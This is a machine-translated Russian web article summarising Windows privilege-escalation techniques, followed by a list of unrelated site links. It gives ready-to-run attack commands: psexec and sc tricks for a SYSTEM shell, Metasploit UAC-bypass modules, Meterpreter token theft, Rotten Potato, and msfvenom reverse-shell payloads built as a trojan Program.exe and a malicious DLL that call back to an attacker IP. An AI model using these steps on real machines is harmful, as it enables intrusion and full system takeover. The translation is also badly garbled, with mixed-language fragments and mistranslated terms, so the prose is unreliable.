Сводная информация о повышении привилегий Windows (очень подробная)
Сводная информация о повышении привилегий Windows (очень подробная)

Конечная цель повышения привилегий в Windows — получить разрешение на работу от имени администратора или пользователя системы. Ключом к повышению привилегий является необходимость сбора большого объема информации о скомпрометированной системе.

от Webshell(apache)、база данных Разрешения——>система Обычный пользователь Разрешения——>AdministratorРазрешения——>SystemРазрешения

Введение

Обычно используемые методы повышения привилегий в Windows включают:

Язык кода:javascript
копировать
- Уязвимость переполнения ядра системы Повышение привилегий
- Повышение привилегий базы данных
- Неправильное повышение привилегий конфигурации системы
- Повышение привилегий предпочтений групповой политики
- WEB промежуточное программное обеспечение лазейки Privilege Elevation
- Взлом DLL и повышение привилегий
- Злоупотребление токенами Разрешения высокого риска для повышения привилегий
- Стороннее программное обеспечение/Служить повышению привилегий и т. д.

Общий сбор информации

Язык кода:javascript
копировать
systeminfo Запросить информацию о системе
hostname имя хоста
net user Просмотр информации о пользователе
netstat -ano | find "3389" Посмотреть номер Служитьpid
wmic os get caption Просмотр названий систем
wmic qfe get Description,HotFixID,InstalledOn Просмотр информации о патче
wmic product get name,version Просмотр текущих установщиков
wmic service list brief Запросить эту машину
wmic process list brief Запросить локальный процесс
net share Просмотр локального списка общих ресурсов
netsh firewall show config Просмотр конфигурации брандмауэра 

Уязвимость переполнения ядра системы

Найти патчи вручную

Язык кода:javascript
копировать
systeminfo Просмотр патчей
wmic qfe get Description,HotFixID,InstalledOn  Просмотр информации о патче

Модуль пост-проникновения MSF

Язык кода:javascript
копировать
post/multi/recon/local_exploit_suggester
post/windows/gather/enum_patches

Коллекция GitHub

Язык кода:javascript
копировать
https://github.com/SecWiki/windows-kernel-exploits

по команде

существоватьWindows2000、Windows 2003、Windows XP Среди этих трех категорий систем мы можем использовать команде Воля Разрешенияповышен доsystemРазрешения。 Потому что по По умолчанию служба работает под системой Разрешения, поэтому мы можем использовать следующую команду для повышения привилегий.

AT-команды могут запускать команды и программы на указанном компьютере в указанное время и дату.

во время /interactive cmd, где параметр /interactive включает интерактивный режим

sc-команда

Применимо к окнам 7/8、03/08、12/16 Потому что по командасуществовать Win7, Win8 и другие более высокие версии системы были отменены, поэтому существуют в некоторых более высоких версиях операционной системы Windows, мы можем использовать sc-команда для повышения привилегий. Команда SC — это мощная команда DOS в системе XP. SC — это программа командной строки, используемая для связи с диспетчером управления службами и службами. Распространено мнение, что SC может запустить службу, а команда следующая.

Язык кода:javascript
копировать
sc Create systemcmd binPath= "cmd /K start" type= own  type= interact 

Среди них systemcmd — это имя службы, вы можете заполнить его по своему усмотрению, binpath — это команда запуска, а type=own указывает, кому принадлежит служба. Вот еще одно объяснение команды cmd /k start. Эта команда запускает новое окно cmd:

Выполнить команду:

Введите: sc start systemcmd, чтобы запустить службу!

Так как на сервере есть интерактивное обнаружение: нажимаем

повышение привилегий psexec

Применимая версия: Win2003. & Win2008 Загрузите инструмент PSexec https://download.sysinternals.com/files/PSTools.zip

Команда повышения привилегий:

Используйте Cmd, запущенный от имени администратора, чтобы ввести команду «Psexec -i -s -d cmd» для повышения привилегий:

Язык кода:javascript
копировать
psexec -i -s -d cmd

Команда повышения привилегий

Язык кода:javascript
копировать
psexec.exe -accepteula -s -i -d cmd.exe 

обход UAC

Что такое ОАК

UAC(User Account Control)аббревиатураКонтроль учетных записей пользователей,UAC Это Windows Представленное в версиях выше Vista, пользователи должны предоставить разрешения или пароль администратора перед выполнением действий, которые могут повлиять на работу компьютера или выполнять действия, которые изменяют настройки, влияющие на других пользователей.

рабочий режим

Язык кода:javascript
копировать
выполнять определенные действия---->Можете ли вы предоставить статус администратора?----->способный(выполнять операции),Напротив

Операции, требующие авторизации UAC:

Язык кода:javascript
копировать
- Настроить Windows Update
- Добавлять и удалять учетные записи; изменять тип учетной записи;
- Изменить настройки контроля учетных записей
- Установить ActiveX, установить и удалить программы;
- Установите драйверы устройств
- Переместите файл /копировать в каталог ProgramFiles или Windows.
- Просмотр папок других пользователей

Несколько идей по обходу UAC

Язык кода:javascript
копировать
-  Взлом белого списка (использование программы белого списка означает, что программа запускается как система Разрешения без уведомления пользователя. Пока мы находим соответствующую программу для ее перехвата, пока программа запускается, она также запускает нашу программу с системой Разрешения.)
- DLL угнать
- Windows Расширение прав и возможностей
- дистанционная инъекция
- COM Технология интерфейса 

Как обойти повышение привилегий UAC

Этот метод обхода обычно выполняется через MSF:

1. Используйте эксплойт/windows/loacal/ask#неожиданно возникнутьUACОкно подтверждения,Нажмите, чтобы получить систему Разрешения

2. байпассуак байпас

Язык кода:javascript
копировать
exploit/windows/local/bypassuac
exploit/windows/local/bypassuac_injection
exploit/windows/local/bypassuac_fodhelper
exploit/windows/local/bypassuac_eventvwr
exploit/windows/local/bypassuac_comhijack 

3. Используйте CVE-2019-1388 для обхода UAC и повышения привилегий.

кража жетона

Применимо к версиям до 2008 года.

что такое токен

Токен — это временный секретный ключ системы, который эквивалентен номеру учетной записи и паролю. Он используется для принятия решения о том, разрешить ли этот запрос и определить, какому пользователю принадлежит этот запрос. Это позволяет вам получить доступ к сетевым и системным ресурсам без предоставления пароля или других учетных данных, и эти токены будут сохраняться в системе до тех пор, пока система не будет перезагружена. Самая большая особенность токенов — их случайность и непредсказуемость. Хакеры или программное обеспечение не могут угадать токены.

кража жетона

кража жетона — выполнять различные операции, выдавая себя за другого пользователя в сети.

  • Токен делегирования: вход в интерактивный сеанс (например, вход локального пользователя, рабочий стол пользователя и т. д.).
  • Токен олицетворения: неинтерактивный вход в систему (пример: использование сети для доступа к общим файлам)

Оба токена будут удалены только после перезапуска системы; токен авторизации станет токеном олицетворения и останется действительным после выхода пользователя из системы. Это можно понять и так,К каким системным ресурсам может получить доступ определенный процесс или поток в текущей системе, полностью зависит от того, чей токен хранит ваш текущий процесс. По умолчанию при перечислении токенов мы можем перечислять только токены текущего пользователя и пользователей с более низкими разрешениями, чем у текущего пользователя. Количество токенов зависит от уровня доступа текущей оболочки. Если текущая оболочка является администраторской или системной, мы можем видеть все токены в системе.

Или сделайте это через MSF:

Сначала вам необходимо загрузить трояна на сервер «Служить», который необходимо повысить, а затем выполнить команду повышения привилегий кража жетона.

Язык кода:javascript
копировать
meterpreter > use incognito # загружать вперед

meterpreter > list_tokens -u # Список токенов

meterpreter > impersonate_token "NT AUTHORITY\SYSTEM" #Украсть системный токен

Гнилая картошка

Применимая версия:Windows 7、8、10、2008、2012

Что такое гнилая картошка?

Так называемая Гнилая картошка Это широко известно какMS16-075,Это локальное повышение привилегий.,это для локальных пользователей,不способный用于域用户。可以ВоляWindowsПривилегии на рабочей станцииот Самый низкий уровень повышается до“ NT AUTHORITY \ SYSTEM”。описание уязвимости ms16-075:Windows SMB Уязвимость несанкционированного повышения привилегий сервера (номер уязвимости CVE: CVE-2016-3225). Когда злоумышленник перенаправляет запросы аутентификации, которые применяются к другим службам, работающим на том же компьютере, Microsoft блок сообщений сервера (SMB) Чжунцуньсуществоватьповышение привилегийлазейки,Успешно используйте этолазейкизлоумышленников могут выполнить произвольный код, используя повышенные привилегии。微软Воля其定义为KB3164038Принцип повышения привилегий RottenPotato (гнилой картофель) кратко можно описать так:

Язык кода:javascript
копировать
(1). Обман "НТ" Учетная запись AUTHORITY\SYSTEM передана NTLM контроль над нами TCP Конечная точка для аутентификации.
(2) Попытка аутентификации «человек посередине» (NTLM Реле) существуют локальные переговоры "NT AUTHORITY\SYSTEM». Проходит через серию Windows API Вызов завершен.
(3) Олицетворяйте токен, о котором мы только что договорились. Это можно сделать только в том случае, если у текущей учетной записи злоумышленника есть разрешение на выдачу себя за токен безопасности. Обычно это относится к большинству учетных записей Служить, но не к большинству учетных записей уровня пользователя.

Адрес ресурса: https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS16-075.

Метод повышения привилегий

Язык кода:javascript
копировать
meterpreter > upload /root/Rottenpotato/rottenpotato.exe

meterpreter > execute -HC -f rottenpotato.exe

meterpreter > use incognito

meterpreter > list_tokens -u

Вы обнаружите, что список токенов содержит токен существующей системы, который использует токен системы для повышения привилегий. 

Уязвимость пути доверенной службы

Если путь к исполняемому файлу службы не заключен в двойные кавычки и содержит пробелы, то служба уязвима. Предполагается, что существует путь обслуживания C:\Program Files (x86)\Common Files\Tencent\QQMusic\QQMusicService.exe

  1. В некоторых случаях: «C:\Program Files (x86)\Common Files\Tencent\QQMusic\QQMusicService.exe» будет считаться полным путем Служить.,Поэтому лазейки производиться не будут.
  2. Без кавычек: путь Служить, по нашему мнению, это C:\Program. Files (x86)\Common Files\Tencent\QQMusic\QQMusicService.exe,Но поскольку вокруг пакета нет двойных кавычек,Windows будет думать, что пробел после пробела C:\Program является параметром программы для запуска Служить. Таким образом, злоумышленник может назвать бэкдор-файл Program.exe и поместить его на существующий диск.,Тогда ожидание запуска или перезапуска, содержащего путь, содержащий лазейки Служить, приведет к выполнению бэкдор-файла.

Обнаружение уязвимостей

осуществлять:

Язык кода:javascript
копировать
wmic service get name,displayname,pathname,startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """

Сначала протестируйте:

Имитировать добавление услуг

Моделируем добавление сервиса:

Язык кода:javascript
копировать
sc create Служитьимя binPath="путь к исполняемой программе"

Добавьте QQ Music как услугу:

Язык кода:javascript
копировать
sc create QQMUSIC binPath= "C:\Program Files (x86)\Tencent\QQMusic\QQMusic.exe"

Установите автоматический запуск:

Язык кода:javascript
копировать
sc config Служитьимя start= AUTO
start=AUTO  (автоматический)
start=DEMAND (руководство)
start=DISABLED  (неполноценный)

Попробуйте протестировать:

Это проблемный сервис.

симулированная атака

kali генерирует трояна:

Язык кода:javascript
копировать
msfvenom -p  windows/x64/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 11 -b '\x00' lhost=192.168.3.62 lport=9527 -f exe -o Program.exe

Поместите трояна на диск C.

Мониторинг на Кали:

Запустите службу:

После того, как сессия будет принята нормально, соединение вскоре будет автоматически разорвано. Вам необходимо включить процесс автоматической миграции команды:

Язык кода:javascript
копировать
set AutoRunScript migrate -f

Взлом DLL и повышение привилегий

принцип:WindowsТребуется при запуске программыDLL。Если этиDLL Если нет, вы можете повысить привилегии, разместив вредоносную DLL в том месте, которое ищет приложение. Обычно приложения Windows имеют предопределенный путь поиска для DLL.

Windows ищет каталоги DLL в следующем порядке:

Язык кода:javascript
копировать
1、Каталог, в который загружается приложение
2、C:\Windows\System32  
3、C:\Windows\System  
4、C:\Windows  
5. Текущий рабочий каталог Текущий Working Directory,CWD  
6. Каталог существующей переменной среды PATH (сначала система, затем пользователь)  

Такая последовательность загрузки может легко привести к захвату системной dll, поскольку, пока злоумышленник объединяет целевой файл и вредоносную dll, вредоносная dll будет загружаться раньше системной dll, а системная dll очень распространена, поэтому на основе этой последовательности загрузки появилось большое количество затронутого программного обеспечения.

процесс:

Язык кода:javascript
копировать
1、Собрать библиотеки DLL, загруженные процессом

2. Создайте dll и загрузите ее.

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.111.131 lport=6666 -f dll >/opt/test.dll  

3. Заменить dll

4. Запустите приложение и используйте порт прослушивания msf для получения возвращенной оболочки.
boy illustration
Учебное пособие по Jetpack Compose для начинающих, базовые элементы управления и макет
boy illustration
Код js веб-страницы, фон частицы, код спецэффектов
boy illustration
【новый! Суперподробное】Полное руководство по свойствам компонентов Figma.
boy illustration
🎉Обязательно к прочтению новичкам: полное руководство по написанию мини-программ WeChat с использованием программного обеспечения Cursor.
boy illustration
[Забавный проект Docker] VoceChat — еще одно приложение для мгновенного чата (IM)! Может быть встроен в любую веб-страницу!
boy illustration
Как реализовать переход по странице в HTML (html переходит на указанную страницу)
boy illustration
Как решить проблему зависания и низкой скорости при установке зависимостей с помощью npm. Существуют ли доступные источники npm, которые могут решить эту проблему?
boy illustration
Серия From Zero to Fun: Uni-App WeChat Payment Practice WeChat авторизует вход в систему и украшает страницу заказа, создает интерфейс заказа и инициирует запрос заказа
boy illustration
Серия uni-app: uni.navigateЧтобы передать скачок значения
boy illustration
Апплет WeChat настраивает верхнюю панель навигации и адаптируется к различным моделям.
boy illustration
JS-время конвертации
boy illustration
Обеспечьте бесперебойную работу ChromeDriver 125: советы по решению проблемы chromedriver.exe не найдены
boy illustration
Поле комментария, щелчок мышью, специальные эффекты, js-код
boy illustration
Объект массива перемещения объекта JS
boy illustration
Как открыть разрешение на позиционирование апплета WeChat_Как использовать WeChat для определения местонахождения друзей
boy illustration
Я даю вам два набора из 18 простых в использовании фонов холста Power BI, так что вам больше не придется возиться с цветами!
boy illustration
Получить текущее время в js_Как динамически отображать дату и время в js
boy illustration
Вам необходимо изучить сочетания клавиш vsCode для форматирования и организации кода, чтобы вам больше не приходилось настраивать формат вручную.
boy illustration
У ChatGPT большое обновление. Всего за 45 минут пресс-конференция показывает, что OpenAI сделал еще один шаг вперед.
boy illustration
Copilot облачной разработки — упрощение разработки
boy illustration
Микросборка xChatGPT с низким кодом, создание апплета чат-бота с искусственным интеллектом за пять шагов
boy illustration
CUDA Out of Memory: идеальное решение проблемы нехватки памяти CUDA
boy illustration
Анализ кластеризации отдельных ячеек, который должен освоить каждый&MarkerгенетическийВизуализация
boy illustration
vLLM: мощный инструмент для ускорения вывода ИИ
boy illustration
CodeGeeX: мощный инструмент генерации кода искусственного интеллекта, который можно использовать бесплатно в дополнение к второму пилоту.
boy illustration
Машинное обучение Реальный бой LightGBM + настройка параметров случайного поиска: точность 96,67%
boy illustration
Бесшовная интеграция, мгновенный интеллект [1]: платформа больших моделей Dify-LLM, интеграция без кодирования и встраивание в сторонние системы, более 42 тысяч звезд, чтобы стать свидетелями эксклюзивных интеллектуальных решений.
boy illustration
LM Studio для создания локальных больших моделей
boy illustration
Как определить количество слоев и нейронов скрытых слоев нейронной сети?
boy illustration
[Отслеживание целей] Подробное объяснение ByteTrack и детали кода